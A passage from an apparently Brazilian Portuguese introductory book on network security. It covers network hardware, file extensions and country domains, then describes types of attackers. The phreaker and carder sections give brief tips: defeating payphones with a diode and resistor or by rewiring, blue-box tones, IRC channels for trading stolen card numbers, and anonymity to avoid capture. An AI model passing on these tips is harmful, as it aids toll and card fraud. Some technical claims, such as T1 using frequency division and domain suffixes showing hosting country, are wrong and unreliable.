com um monitor de rede ou analisador, o jeito é segmentar tráfico de rede para isolar algumas comunicações. Isto é melhor realizada com uma switch, bridge, ou um roteador.

P1.12 Topologias de Circuito privadas São linhas alugadas que podem ser circuitos analógicos ou

digitais dedicados em que você paga uma taxa pelo servoço. Isto significa que se você usa o circuito ou não, você estará pagando uma taxa mensal fixa. Essas linhas São ponto a ponto e sao usados para conectar um local geográfico a outro.

Um T1 é um sinal full--dúplex (cada lado da conexão pode transmitir e pode receber simultaneamente) em cima dos cabos de par trançado. Este par de cabos termina em um receptáculo que se assemelha a um telefone quadrado usado em casas mais velhas. T1s são usados para conexões de ponto a ponto. E a largura da banda em uma T1 está disponível entre 64Kb até 1.544Mb. T1s usam divisão de freqüência para transmitir nos dois pares de fios 24 canais separados. Divisão de freqüência é a partilha da largura da banda disponível baseado em incrementos de freqüência. Isto é extremamente útil como uma T1 é capaz de levar voz e dados ao mesmo tempo.

Temos no Brasil coisas como Speed da telefônica, que traz uma conexão de banda larga bem mais alta e é cobrada uma taxa por seu serviço. Isso é o ADSL.

P1.13 Hardware básicos para Gestão de redes

Terrorismo Tecnológico Aprenda Para Sobreviver

31

Hoje em dia há uma grande quantidade de produtos para

considerar ao planejar sua infra-estrutura de rede. Há dispositivos para tudo dês de conectar sistemas de computador à rede para estender as especificações de uma topologia a controlar tráfico de rede. Às vezes suas escolhas estão limitadas. Por exemplo, para conectar um computador de escritório à rede, você tem que ter uma placa de rede.

Muitos destes dispositivos, quando usado corretamente, também pode ajudar melhorar sua segurança na rede.

P1.14 Repetidores Repetidores são simples amplificadores. Eles são usados em

uma topologia de rede para estender a distância máxima que pode ser feita com cabos. A força do sinal é impulsionada e viaja dentro dos cabos. Um repetidor receberá um sinal digital e os ampliará, e transmitirá para outro cabo fazendo assim uma continuação do sinal.

Um repetidor está como um amplificador de estéreo em aparelhos de som. O ampère leva o sinal que recebe do CD, amplia o sinal, e envia isto a seu aparelho de som.

Repetidores funcionam semelhantemente a um amplificador de radio: eles impulsionam tudo o que simplesmente recebem e enviam isto em sua outra saída (a continuação dos fios). Infelizmente, o sinal que um repetidor recebe poderia ser uma qualidade boa de dados, uma qualidade ruim de dados, ou muito barulhenta. Um repetidor não discerne qualidade de dados; simplesmente olha para cada dos pulsos digitais individuais e os amplifica.

Um repetidor não provê nenhuma segmentação de dados. Todas as comunicações que acontecem em um lado de um repetidor são passadas juntas para o outro lado, se o sistema receptor está no outro fim do cabo ou não.

Terrorismo Tecnológico Aprenda Para Sobreviver

32

P1.15 Hub Hub é provavelmente o mais comum dos hardwares de rede

mais próximos às placas de interface de rede. Fisicamente, elas são caixas de tamanhos variados que têm conectores tipo RJ45 femininos múltiplos. Cada conector é projetado para aceitar um cabo de par trançado equipado com um conector de RJ45 masculino. Este cabo de par trançado é usado para conectar em um único servidor ou estação de trabalho.

Hubs são essencialmente repetidores de multi portas que apóiam cabos de par trançado formando uma topologia de estrela. Cada nodo comunica com o hub que amplia o sinal e as transmite para todas as portas (inclusive para a mesma porta que ele recebeu a transmissão). Como são repetidores, hubs trabalham em nível elétrico. Quando você projetar sua topologia de rede, pense em hubs que provêem zero controle de tráfego como funcionalmente idêntico para repetidores.

P1.16 Bridges É uma ponte se parece muito com um repetidor; é uma caixa

pequena com dois conectores de rede que prendem a duas porções separadas da rede. Uma ponte incorpora a funcionalidade de um repetidor (amplificação notável), mas na verdade olha para as armações de dados que o que é um grande benefício. Uma ponte comum é quase idêntica a um repetidor com exceção do indicador luminosom que piscam sempre que a ponte precisa passar tráfico de um domínio para outro.

As pontes podem usar informação de cabeçalho da rede

TCP/IP para ficar monitorando a fonte e destino MAC para onde se dirige. Monitorando o endereço de fonte, a ponte aprende onde todos os sistemas de rede ficam situados. Constrói uma tabela,

Terrorismo Tecnológico Aprenda Para Sobreviver

33

enquanto listando quais endereços de MAC são diretamente acessíveis por cada uma de suas portas. Usa então essas informações para policiar o tráfego e regular o fluxo de dados na rede.

Um Exemplo de Ponte Olhe para a rede em Figura abaixo. A Betty precisa enviar

dados ao servidor Thoth. Como todo o mundo na rede tem que monitorar a rede, a Betty escuta primeiro as transmissões de outras estações. Se o fio estiver livre, a Betty transmitirá um pacote de dados. A ponte também está assistindo os tráfegos e olhará para o endereço de destino no cabeçalho do pacote de Betty. Porque a ponte é insegura de qual porta o sistema com MAC endereçado 00C08BBE0052 (Thoth) é conectado, amplifica o sinal e retransmite isto fora pa porta B. que até agora a funcionalidade de ponte é bem parecido a de um repetidor. A ponte faz uma pequena leitura, porém, aprendeu aquela Betty é para aportar para porta A e cria uma tabela com o endereço de MAC dela.

Terrorismo Tecnológico Aprenda Para Sobreviver

34

Quando Thoth responde ao pedido de Betty, como mostrado na

próxima figura, a ponte olhará novamente para o endereço de destino no pacote de dados. Porém, desta vez olha em sua tabela, e nota que aquela Betty também é prendido para Aportar o A. que Porque sabe que a Betty pode receber esta informação diretamente, derruba a armação e blocos isto de ser transmitido de Porto o B. A ponte também fará uma entrada de mesa nova para Thoth, enquanto registrando o MAC se dirigem como sendo fora de Porta A.

Terrorismo Tecnológico Aprenda Para Sobreviver

35

O isolamento de tráfego é uma característica poderosa, porque

significa que sistemas em ambos os lados da ponte podem estar levando ao mesmo tempo em conversações, dobrando a largura da banda disponível efetivamente. A ponte assegura que as comunicações em ambos os lados ficam isoladas, como se elas nem fossem mesmo conectadas junto. Porque estações não podem ver as transmissões no outro lado da ponte, eles assumem que a rede está livre e envia os seus dados.

Isto significa que não há nenhum modo para uma estação ter uma colisão fora de seu segmento.

A ponte isola tráfego dentro de cada domínio, não há nenhum modo para sistemas separados colidirem os sinais. O efeito é um dobramento de largura da banda potencial.

Terrorismo Tecnológico Aprenda Para Sobreviver

36

Perceba agora que a rede aumentou e muito a sua segurança, pois agora foi criado uma ponte segura para a comunicação entre dois usuários e os pacotes só estar trafegando por esse espaço que esta em segurança devido a forma em que a ponte esta tratando os pacotes.

P1.17 Switches Switch é quase como uma ponte só que com uma tecnologia

maior. Eles se assemelham a hubs aparência, tendo conectores de RJ45 múltiplos para conectar sistemas de rede. Em vez de ser um simples amplificador como um hub, funciona como um interruptor como se tivesse uma pequena ponte em cada porta. Um interruptor aprenderá endereços de MAC preso a cada uma de

Terrorismo Tecnológico Aprenda Para Sobreviver

37

suas portas e tráfego de rota só será destinados para a porta correta, a qual os pacotes se destinan.

Veja na figura abaixo um ambiente qual cada dispositivo é

conectado a uma porta dedicada. A Switch aprenderá a identificação de MAC de cada estação uma vez uma única transmissão de pacotes acontece (idêntico a uma ponte). Assumindo que isto já aconteceu basta a máquina enviar o pacote na rede e a switch encaminhará os dados para a porta de destino entregando-os em segurança.

Há algumas coisas interessantes sobre esta situação. O primeiro é que a cada lança,mento de pacotes somente a máquina e switch receberam os pacotes. Isto significa que a colisão é limitada as só estes dois dispositivos, por que cada porta do

Terrorismo Tecnológico Aprenda Para Sobreviver

38

interruptor está agindo como uma ponte. O único tráfego visto pelas estações de trabalho e servidores especificamente são somente as que eles mesmos enviaram. Como resultado, todas as três estações verão muito pouco tráfego de rede e poderão transmitir imediatamente e multiplamente.

Dado nosso exemplo, se esta for uma rede de 10Mbps, o processamento efetivo há pouco aumentou por um fator de 3. Isto é porque todos os três jogos de sistemas podem manter as conversações simultaneamente, pois o interruptor os isola de um ao outro. Enquanto ainda tecnicamente for 10Mbps o processamento potencial aumentou para 30Mbps.

Além de desempenho crescente aumentou-se também

segurança. Se qualquer um destes sistemas for feito um acordo, as únicas sessões que podem ser monitoradas são sessões com os que chegaram a um acordo sistema. Por exemplo, se um atacante ganhar acesso ao Servidor 2, ela não poderá monitorar sessões de comunicação com Servidores 1 ou com o Servidor 3, só com o Servidor 2.

Isto é porque monitorando dispositivos podem roubar somente o tráfego que está sendo transmitindo dentro do fluxo daqueles cabos.

Enquanto esta for uma característica de segurança maravilhosa, faz com que o monitoramento de sua rede seja pouco incômodo. Isto é por que muitas switches incluem um porta de monitoramento.

Uma porta de monitoramento simplesmente é uma porta na switch que pode ser configurada para receber uma cópia de todos os dados transmitidos a uma ou mais portas. Por exemplo, você poderia pela porta 10 da switch configurando-a para escutar todo o tráfico da porta 3. Se a porta 3 for um de seus servidores, você poderá analisar todo o tráfico que flui neste sistema.

Mas este também pode ser um problema de segurança potencial. Se um invasor puder ganhar acesso administrativo ao switch (por Telnet, a porta HTTP, SNMP, ou o console), ela teria carta branca para monitorar qualquer sistema conectado. Se o invasor conseguisse acessar Servidor 2 e a própria switch, ele

Terrorismo Tecnológico Aprenda Para Sobreviver

39

estaria agora em uma posição perfeita monitorar todas as comunicações de rede.

Perceba que pontes, switches, e dispositivos de gestão de

redes são projetados para melhorar o desempenho de rede e não para melhorar segurança da rede. Segurança aumentada é há pouco um benefício secundário. Isto significa que eles não receberam o mesmo tipo cuidado, para que no mundo real não causasse problemas.

P1.18 VLAN Tecnologia Switches introduziu uma nova tecnologia de rede que é a Área

Local Virtual (VLAN). Software que corre na switch lhe permite montar parâmetros de conectividade para sistemas conectados através de workgroup (chamado grupos de VLAN). O administrador da switch lhe permite organizar transmissões de portas logicamente de forma que a conectividade se agrupe de acordo com as exigências de cada usuário.

Nomeando todas as portas da switch que conectam os PCs usados pelo pessoal de contabilidade ao mesmo grupo de VLAN, você pode criar uma rede de contabilidade virtual.

Se você tem uma switch de 24 portas e você as divide em três VLANs separado, você tem três switchs de 8 porto cada.

Mas se um invasor puder atacar uma switch que usa VLANs,

ele poderia configurar a conexão dele para monitorar qualquer do outra VLANs no mesmo dispositivo.

Esta pode ser uma coisa extremamente ruim se você tiver uma switch grande que provê conectividade em ambos os lados de um dispositivo de controle de tráfego como em um firewall. Um invasor pode não precisar penetrar em seu firewall ele usará a switch por ser mais fácil.

Terrorismo Tecnológico Aprenda Para Sobreviver

40

P1.19 Roteadores Um roteador é um dispositivo de multi portas que decide como

controlar tráfegos na rede, baseado em protocolo e informação de rede. Entender o que isto significa verdadeiramente, nós teremos que olhar primeiro para o que um protocolo é e como ele trabalha.

Até agora, temos comunicado usando o endereço de Controle de acesso de Mídia nomeado a nossos dispositivos de gestão de redes.

Nossos sistemas usaram este número para contatar outros sistemas e transmitir informação.

O problema com este esquema é que não funciona muito bem. Por exemplo, se você tem 2000 sistemas que precisam comunicar entre si? Você teria 2000 sistemas que brigam um contra o outro para a largura da banda em uma única rede de Ethernet.

P1.20 Protocolos de rede Os mais baixos níveis de um protocolo de rede é um jogo de

regras de comunicação que provêem os meios para transmitir em rede os dados por uma instalação elétrica comum. Isto faz parte de um grupo específico, cada um destes sistemas é nomeado com um endereço de rede de protocolo idêntico.

Endereços de rede são como os de CEP. Assumamos que alguém remeta uma carta e na frente do envelope simplesmente se lê: Para o senhor Leandro, Na rua velha. Se isto acontecer em uma cidade muito pequena, a carta provavelmente chegará (é como se você tivesse usado um endereço de MAC em uma LAN).

Se a carta fosse remetida em uma cidade como São Paulo ou Nova Iorque, o correio não teria nenhuma pista para onde enviar isto.

Sem um CEP, eles não podem nem mesmo tentar encontrar. O CEP provê um modo para especificar a área geral onde esta carta precisa ser entregue.

Terrorismo Tecnológico Aprenda Para Sobreviver

41

O entregador de carta não precisa saber exatamente onde a rua velha fica situada. Ele simplesmente olha para o CEP e o envia para quem é responsável entregar cartas nesta área.

Endereços de rede operam dem um modo semelhante. Um dispositivo atento ao protocolo acrescentará o endereço de rede do dispositivo de destino ao campo de dados. Também registrará seu próprio endereço de rede, no caso de as necessidades de sistema remotas enviem uma resposta.

Isto é onde um roteador entra. Um roteador é um dispositivo atento ao protocolo que mantém uma tabela de todas as redes conhecidas. Usa esta tabela para levar o protocolo ao seu destino final.

Vejamos o exemplo. Digamos que o sistema que B precisa transmitir informação ao

sistema F

Como as máquinas estão fisicamente separadas, pois estão em

redes diferentes ela precisa de alguém que conheça quem é aquela máquina e quem sabe disso é o roteador que contem tabelas com os “CPS” das redes então a máquina B entrega os

Terrorismo Tecnológico Aprenda Para Sobreviver

42

pacotes ao roteador da network 1 que manda ao roteador da network 3 que é a onde a máquina F está.

P1.21 Extensões de arquivos comuns e não tão comuns

.exe é de um arquivo executável assim como .doc é de um

arquivo de texto do Microsoft Word, porém existem alguns arquivos que muitas vezes recebemos via e-mail e não sabemos se pode ser vírus, ou nem mesmo sabemos de qual programa ele pertence a tabela abaixo o ajudara a conhecer um pouco mais a respeito das extensões.

Ext Arquivo do tipo 7le 7th Level 7lp 7th Level 7ls 7th Level aiff áudio ani cursor animado arj ARJ art AOL arquivo gráfico comprimido asf Windows Media asm ASM au áudio avi vídeo bas código fonte de Basic bin binário bmp imagem c Canvas cab FutureSplash cdf IE Channel Definition Format cdr imagem de CorelDraw class arquivo Java class

Terrorismo Tecnológico Aprenda Para Sobreviver

43

cnf E-cash cod FORTRAN/Multiplan/dBASE css cascading style sheet cur cursor Windows dcr Director dir directory/Procom dialing directory doc MS Word dwt DreamWeaver template dxr Director fla Flash ged imagem gif imagem gz arquivo comprimido hdml handheld device markup language hqx Mac BinHex htm html html htm inf OS/2 Setup file ivr image ivs vídeo jar Java archive java Java jpeg imagem jpg imagem js JavaScript key keyboard macro lbi DreamWeaver library item lwp Lotus Word Pro map mapa de imagem mdb Acesso mid MIDI mod música mov QuickTime MooV mp2 mpeg áudio mp3 mpeg áudio mpeg mpeg vídeo mpg mpeg vídeo mtm multi-tracker module

Terrorismo Tecnológico Aprenda Para Sobreviver

44

pas pascal pdf Acrobat Portable Data Format pl Perl ply imagem pps MS PowerPoint slide pub MS Publisher png imagem ppt MS PowerPoint ps PostScript qt QuickTime MooV ra RealAudio ram RealAudio (ou Vídeo) meta-file rm RealMedia rmf áudio rmx RealJukebox rp imagem rpm RealMedia plugin rt RealText rtf Rich Text Format s3m sound scm video sit Arquivo comprimido Mac smi SMIL smil SMIL spl Shockwave/Flash swf Shockwave/Flash tgz g-zipped TAR tif imagem tiff imagem tmp temporário tms Telemate script tsp TrueSpeech txt ASCII texto utf8 MS FrontPage viewlet Viewlet viv vídeo vivo vídeo vox som

Terrorismo Tecnológico Aprenda Para Sobreviver

45

wav som wax Windows Media wma Windows Media wml WML wrk planilha wrl VRML x fonte LEX xls Excel xml extensible markup language zip arquivo comprimido

P1.22 Em qual país este site está hospedado? Você já entrou em um site e não teve a menor noção de onde ele está

hospedado? Isso não vai mais acontecer ao entrar em um site observe o final do endereço e consulte a tabela a seguir ex: www.axcel.com.br o .br quer dizer que está hospedado no Brasil!

A

AD Andorra AE Emirados Árabes Unidos AF Afeganistão AG Antígua e Barbuda AI Anguila AL Albânia AM Armênia AN Antilhas Holandesas AO Angola AQ Antártica

Terrorismo Tecnológico Aprenda Para Sobreviver

46

AR Argentina AS Samoa Americana AT Áustria AU Austrália AW Aruba AZ Azerbaijão

B

BA Bosnia-Herzegovina BB Barbados BD Bangladesh BE Bélgica BF Burkina Fasso BG Bulgária BH Bahrein BI Burundi BJ Benin BM Bermudas BN Brunei BO Bolívia BR Brasil BS Bahamas BT Butão BV Ilha Bouvet BW Botsuana BY Bielorússia BZ Belize

Terrorismo Tecnológico Aprenda Para Sobreviver

47

C

CA Canadá CC Ilhas Keeling (Cocos) CF República Centro-Africana CG Congo CH Suíca CI Costa do Marfim CK Ilhas Cook CL Chile CM Camarões CN China CO Colômbia CR Costa Rica CS Tchecoslováquia CU Cuba CV Cabo Verde CY Chipre CZ República Tcheca

D

DE Alemanha DJ Djibuti DK Dinamarca DM Dominica DO República Dominicana DZ Argélia

Terrorismo Tecnológico Aprenda Para Sobreviver

48

E

EC Equador EE Estônia EG Egito ES Epanha ET Etiópia

F

FI Finlândia FJ Ilhas Fiji FK Ilhas Falkland (Malvinas) FM Micronésia FO Ilhas Faroe FR França FX França (Território Europeu)

G

GA Gabão GB Grã Bretanha (Reino Unido) GD Granada GE Georgia GF Guiana Francesa GH Gana

Terrorismo Tecnológico Aprenda Para Sobreviver

49

GI Gibraltar GL Groenlândia GM Gâmbia GN Guiné GP Guadalupe (Francesa) GQ Guiné Equatorial GR Grécia GT Guatemala GU Guam (EUA) GW Guiné Bissau GY Guiana

H

HK Hong Kong HM Ilhas Heard e Macdonald HN Honduras HR Croácia HT Haiti HU Hungria

I

ID Indonésia IE Irlanda IL Israel IN Índia IQ Iraque

Terrorismo Tecnológico Aprenda Para Sobreviver

50

IR Irã IS Islândia IT Itália

J

JM Jamaica JO Jordão JP Japão

K

KE Quênia KH Cambódia KI Kiribati KM Ilhas Comores KP Coréia do Norte KR Coréia do Sul KW Kuáit KY Ilhas Cayman KZ Cazaquistão

L

LA Laos

Terrorismo Tecnológico Aprenda Para Sobreviver

51

LB Líbano LC Santa Lúcia LI Liechtenstein LK Sri Lanka LR Libéria LS Lesôto LT Lituânia LU Luxemburgo LV Látvia LY Líbia

M

MA Marrocos MC Mônaco MD Moldávia MG Madagascar MH Ilhas Marshall ML Mali MN Mongólia MO Macau MQ Martinica MR Mauritânia MT Malta MU Ilhas Maurício MV Maldivas MW Malaui MX México MY Malásia MZ Moçambique

Terrorismo Tecnológico Aprenda Para Sobreviver

52

N

NA Namíbia NC Nova Caledônia NE Níger NF Ilha Norfolk NG Nigéria NI Nicarágua NL Países Baixos (Holanda) NO Noruega NP Nepal NR Nauru NT Zona Neutra NU Niue NZ Nova Zelândia

O

OM Omã

P

PA Panamá

Terrorismo Tecnológico Aprenda Para Sobreviver

53

PE Peru PF Polinésia PG Papua PH Filipinas PK Paquistão PL Polônia PR Porto Rico PT Portugal PW Palau PY Paraguai

Q

QA Qatar

R

RO Romênia RU Rússia RW Ruanda

S

Terrorismo Tecnológico Aprenda Para Sobreviver

54

SA Arábia Saudita SB Ilhas Salomão SC Seicheles SD Sudão SE Suécia SG Cingapura SH Santa Helena SI Eslovênia SK República Eslovaca SL Sierra Leone SM San Marino SN Senegal SO Somália SR Suriname ST São Tomé e Príncipe SU União Soviética SV El Salvador SY Síria SZ Suazilândia

T

TD Chade TG Togo TH Tailândia TK Toquelau TM Turcomenistão TN Tunísia TO Tonga TP Timor Leste TR Turquia

Terrorismo Tecnológico Aprenda Para Sobreviver

55

TT Trinidad e Tobago TV Tuvalu TW Taiwan TZ Tanzânia

U

UA Ucrânia UG Uganda UK Reino Unido US Estados Unidos UY Uruguai UZ Uzbequistão

V

VA Vaticano VC São Vicente e Granadinas VE Venezuela VG Ilhas Virgens Britânicas VI Ilhas Virgens Americanas VN Vietnã VU Vanuatu

Terrorismo Tecnológico Aprenda Para Sobreviver

56

W

WS Samoa

Y

YE Iêmen YU Iugoslávia

Z

ZA África do Sul ZM Zâmbia ZR Zaire ZW Zimbabue

Terrorismo Tecnológico Aprenda Para Sobreviver

57

Capítulo I Introdução à segurança – Ao entrarmos em um aeroporto,

espera-se toda a segurança que é necessária, já que a própria historia nos vem mostrando que é um assunto delicado e que deve ser abordado. Mas existe o terror tecnológico? Ele nos trará problemas? Quais problemas?

Terrorismo Tecnológico Aprenda Para Sobreviver

58

Parte I

1.1 Estamos totalmente seguros? Com absoluta certeza não! Munidos de um computador e uma

conexão a Internet, pode-se invadir um aeroporto em Nova York, mesmo estando em uma pequena cidade do interior de Minas Gerais no Brasil ou em qualquer lugar do mundo onde se tenha acesso a Internet. E isto pode acontecer em qualquer outro aeroporto existente.

Já ficou comum lermos em jornais sobre algum hacker que tenha invadido sistemas, roubando bancos, ou apagando e lendo dados confidenciais.

E isto pode se estender a uma grande confusão no aeroporto como passageiros com nomes trocados ao embarcar, nomes que não constam na lista, informações nos letreiros erradas, ou na pior das hipóteses, uma invasão no Controle de Trafego Aéreo, que poderia causar a queda de um avião, uma colisão, ou no menos pior o avião acabar alguns kilometros longe do destino final.

E isso pode acontecer facilmente já que em dias nublados ou a noite é apenas por instrumentação que o avião utiliza para se orientar.

Quando um avião esta chegando ao aeroporto ele recebe informações como a de que o avião esta a uma quantidade x de “kilometro” do solo.

Bom imagine que na realidade ele está a 400 metros do solo, mas o seu indicador informou que está a 600 metros. Quando o piloto achar que ainda faltam 200 metros do solo, o avião já estará explodindo e devastando tudo o que há em volta.

Pânico geral. Mas não se deve ter medo, mas sim tomar

certas políticas de seguranças e assim dificultar e proteger todo o sistema computacional, o que é imprescindível.

Terrorismo Tecnológico Aprenda Para Sobreviver

59

Políticas de segurança como usuários domésticos também tem que tomar como, por exemplo, usar o Net Bank na sua casa a vontade, mas mantenha sempre o seu sistema operacional, Service Pack, e o navegador, geralmente o I.E. e o Netscape, sempre atualizados. Evite acessar sua conta de universidades, Cyber Cafés e locais onde muitas pessoas usam o mesmo micro. Soluções simples, mas muito eficazes.

Isto lembra o caso como o da corrida espacial. Quando os EUA gastaram milhões para desenvolver uma caneta, pois as canetas normais não escreviam de cabeça para baixo e com a pouca gravidade. A URSS resolveu o problema usando um lápis.

Há muita espionagem industrial. Experts em informáticas são

contratados para invadir sistemas e descobrir dados confidenciais. Grupos de hacker brasileiros estão cada vez mais “populares”,

já que o Brasil é um dos paises onde mais se têm invasores e menos seguranças, chegando a ponto de empresas como a Nasa proíbe que certas páginas do seu site sejam exibidas para moradores do Brasil, com finalidade da não invasão.

Outro grande problema são com os vírus, que não descobrem nada porém apagam arquivos e geram uma dor de cabeça bem grande para os administradores de rede e todos os usuários.

Mas...

1.2 Quais os motivos que levam este invasor? Terrorismo é o maior problema a ser enfrentado. Fazer uma

confusão nos computadores dos aviões ou do ATC (comando de trafego aéreo). Pode-se também conseguir dados de certas empresas aéreas, seus funcionários e passageiros.

Terrorismo Tecnológico Aprenda Para Sobreviver

60

Todo o sistema aéreo é computadorizado, deixando então uma ampla possibilidade aos terroristas cibernéticos.

Os outros invasores o fazem pelo prazer de dizer que possui um conhecimento maior e se afirmar como mais poderoso.

Claro que há os que querem ganhar dinheiro roubando informações, dados, senhas etc, mas a maioria quer mostrar que manda e tem poder na net. Busca de vingança também é bem grande. E a vontade de apagar sistemas confundir os controladores embaralhar informações e rir do sofrimento do outro.

E hoje o principal medo são os Terroristas, que não se sabe

como, quando e em que lugar eles irão atacar.

1.3 Como é este Hacker? Certamente se você procurar na Internet vai achar muitos sites

que dizem como é esse invasor. É tudo furada. Particularmente já vi quase de tudo, por exemplo, o de um

menino de 14 anos que retirou R$ 4000,00 reais da conta de um vizinho, ou outro que trocou uma foto da capa de um site de jornalismo bem conhecido por uma foto pornográfica e pessoas bem mais velhas enfim não existe um biótipo.

Porém, geralmente são do sexo masculino, quietos, e não são do tipo que dizem: “eu faço...”, eles fazem.

Já, aqueles caras que na sala de aula de um curso ou em uma roda de bate papo falam que fazem isso, invadem aquilo... Esses normalmente nem sabem enzipar um arquivo.

Terrorismo Tecnológico Aprenda Para Sobreviver

61

1.4 Sistema Seguro Vemos hoje em dia muitos administradores colocando um

sistema Unix, e geralmente o Linux como servidor e em alguns casos até como micro clientes, geralmente achando que assim seu sistema estará seguro.

Muito mais inocente é aquele que instala um antivírus ou um firewall e começa a se sentir em uma fortaleza, parece até a historia dos três porquinhos, acontece que nesse ponto (informática e segurança) é como um ladrão, se ele realmente quer roubar uma casa um simples cadeado não vai fazer diferença, pode até atrapalhar um pouco, mas nada que uma serra não resolva.

A questão é que quem cuidará da rede (administrador ou o administrador de segurança) deve se conscientizar e usar uma ampla política de segurança. Que muitas vezes não requer nem muitos gastos, a não ser gasto de tempo, paciência e muito conhecimento.

Daí vale lembrar que alguém que é contratado por pouco dinheiro possivelmente saberá pouco e fará menos ainda.

1.5 O administrador É o principal responsável pela rede. Geralmente quem a

projetou, é quem a administra. Possivelmente ele deve todos os dias checar os logs de erro,

checar os dados, administrar usuários, controlar servidores, fora todos os problemas que acontecem todos os dias em uma rede. Acontece que a grande maioria dos administradores hoje não se preocupa com a segurança como deviam, e é obvio que caso os problemas não sejam corrigidos conforme forem aparecendo logo

Terrorismo Tecnológico Aprenda Para Sobreviver

62

a rede ira parar, não importando se é uma rede feita com fibra óptica, servidores duais com três GB de memória DDR-DIMM. Não importa qual sistema operacional ou antivírus e firewall instalados, a rede vai dar problema!

Tudo tem que ser resolvido rapidamente caso for ficar pensando muito e burocratizando atrapalhara a resolução e assim a rede ficara cada vez mais com problemas. Imagine uma situação de um banco as 11:30 da manha, com filas kilometricas e pronto. O sistema cai. Parece engraçado, mas duvido que alguém já não chegou em uma loja, supermercado, hospital ou em algum lugar que se use a informática e alguém falou essa frase – "desculpe, mas o sistema caiu”.

Não vou dizer que isso não acontece, mas a máquina não erra e sim nós.

1.6 Mentiras? Imaginação? Há uma diferença grande entre os invasores que vemos nos

filmes e os da vida real. Não existe mágica nem efeitos especias, e absolutamente não há nada de espetacular e incrível de se fazer uma invasão em um sistema alheio. Bastam alguns conhecimentos e pronto se o sistema a ser invadido não tem política de segurança qualquer pessoa com um conhecimento mínimo de informática pode conseguir algum resultado. É claro que você não vai invadir uma grande empresa que toma todos os cuidados, mas as informações de seus amigos já é outra historia.

Terrorismo Tecnológico Aprenda Para Sobreviver

63

Parte II

1.7 Os Invasores A definição mais apropriada seria dizer que é um invasor,

qualquer um que entre em um sistema no qual não lhe foi dado à permissão.

Então qualquer um que o fizer será um invasor, mesmo que esse não tenha um grande conhecimento de informática, mas conseguiu ver algo que não lhe foi concebido.

1.7.1 - Lammer Esse é o que mais tem, mas nunca admite ser. O lammer é um

cara que começou a aprender informática e lendo alguns textos já se acha o tal. Ele diz fazer muitas coisas como invadir destruir e faz muita autopropaganda, mas no fim ele mal sabe usar um arj.

1.7.2 - Hackers Esses são muito confundidos, os lammers, sem entender de

nada, (mas dizendo que sabem tudo) se diz ser um hacker. Hackers são pessoas que vivem para a informática, gostam e

querem aprender tudo a seu respeito. Aprendem a invadir destruir e tudo mais, mas não o fazem, pois só tem a curiosidade de aprender e saber das falhas.

Cresce muito o número de empresas que contratam os hackers para defender o seu sistema.

Terrorismo Tecnológico Aprenda Para Sobreviver

64

1.7.3 - Cracker Agora sim é perigoso! Esse tem o prazer em destruir, roubar

informações para o seu uso e para vendê-la, ou somente ter a diversão em ver tudo parar de funcionar e dizer que foi ele quem o fez.

Constrói vírus, usa trojans, enfim o que há de ruim está neste ser.

Muitas vezes eles querem se vingar de algum administrador, operador de sistema ou de algum canal de IRC, enfim eles usam o seu conhecimento para benefícios pessoais.

Esse é muito contratado por algumas empresas para fazer espionagem industrial.

1.7.4 - Phreakers São experts em telefonia, querem entender como funcionam

todo o processo telefonico e é claro tirar vantagem disto. Geralmente utilizam programas e dispositivos que assim podem

utilizar o telefone gratuitamente. Coisas que chegam a ser muito fácil de fazer, e realmente funcionam.

Pioneiro nisso foi o Capitão Crunch, que com um pequeno apito encontrado em pacotes de cereais percebeu que tinha a mesma freqüência usada pelos orelhões da AT&T, fazendo com que discassem de graça. Coisa parecida com o que aconteceu com os orelhões na Telefonia no Brasil que a partir dos barulhos feitos pelo celular completavam as ligações. O problema foi resolvido tendo que trocar algumas placas destes orelhões.

Muito utilizado é o blue box, um programa que gera tons de 2600db pela placa de som, fazendo com que a companhia telefônica não reconheça a chamada e então não será cobrada a ligação. Já o Black Box funciona para ser usado nos telefones particulares (domésticos).

Já os que preferem a parte física da coisa podem usar um diodo e um resistor nos orelhões, pois funciona mais ou menos

Terrorismo Tecnológico Aprenda Para Sobreviver

65

assim: Quando você coloca o cartão telefônico ele tem uma certa quantidade de fusíveis quando se completa uma chamada é emitido um certo “choque” e então queima um desses fusíveis e lá se vai uma unidade do cartão.

Basta que esse fusível não se queime! A prática do diodo e resistor simplesmente engana o orelhão. Outra coisa praticada por esses invasores são o de cortar os dois fios atrás do orelhão (naquela torre ou perto da parede) e ligá-lo a um telefone comum assim funcionara como um telefone doméstico. As companhias telefônicas devem tomar mais cuidado.

Isso tudo é crime, porém é muito mais muito difícil esses Phreakers serem pegos, e nossas leis estão um pouco para não dizer muito atrazada.

Há também funcionarios da própria empresa telefonica que instala telefones clandestinos, geralmente em nome de defuntos ou laranjas, essa prática vem cescendo muito, principalmente pela má contratação, pessima qualidade e falta de treinamento dos seus funcionarios.

No capítulo 5 este assunto é tratado de uma forma mais prática.

1.7.5 - Funcionários Esse é o principal problema. Geralmente 70% dos problemas

ocorridos estão aqui. Funcionários mal remunerados ou subordinados querem

vingança contra a empresa ou seus chefes. Aí começa o problema, pois o invasor esta dentro da própria empresa e possui as senhas e o acesso aos dados.

Então basta entrar lá e os apagar, bagunçar os dados ou até transferir algum dinheiro para a Suíça. Engana-se quem acha que isso é um exagero, pois é o que mais acontece.

Muitas vezes estão comprometendo a rede, como em instalar joguinhos ou programas de Chat que podem ter trojans e colocar a

Terrorismo Tecnológico Aprenda Para Sobreviver

66

rede em riscos. Ou até para saber o telefone da “gostosa” do outro setor.

Firewall é ineficaz contra eles, pois estão dentro da rede e com certeza os administradores não estarão preocupados e nem preparados para enfrentá-los.

1.7.6 - Terroristas Este é um campo que os terroristas estão avançando em largos

passos, e é muito mais fácil causar grandes transtornos e até desastres aéreos via a informática do que a via física, já que o contato não é mais direto, mas sim via teclado.

1.7.7 Carders

È um pouco difícil para que um hacker consiga decodificar os

números dos cartões, mas isso não impede que se ele roube as informações (banco de dados) no servidor da página da prestadora dos cartões assim sendo ele conseguira as informações dos clientes.

Os não tão experts em invasões simplesmente ganham essas informações!

No IRC existem canais específicos dos carders como no servidor /server irc.cris.com nos canais #carder, #card, #carding

Essas informações são trocadas, pois assim fica muita mais difícil de se descobrir que esta usando o cartão, pois muita gente de muitos lugares diferentes o utiliza e assim é difícil saber quem realmente o roubou.

Assim o carder sai comprando, mas quando ele preenche os

dados em páginas de cadastro, seu endereço IP é rastreado pela página e salvo em um bando de dados, para que este possa ser localizado, porém se usar os recursos de Anonimidade assim não será pego.

Geralmente usam os cartões para acessar páginas e registrar softwares

Terrorismo Tecnológico Aprenda Para Sobreviver

67

Geralmente são usados cartões de estrangeiros já que o limite é maior.

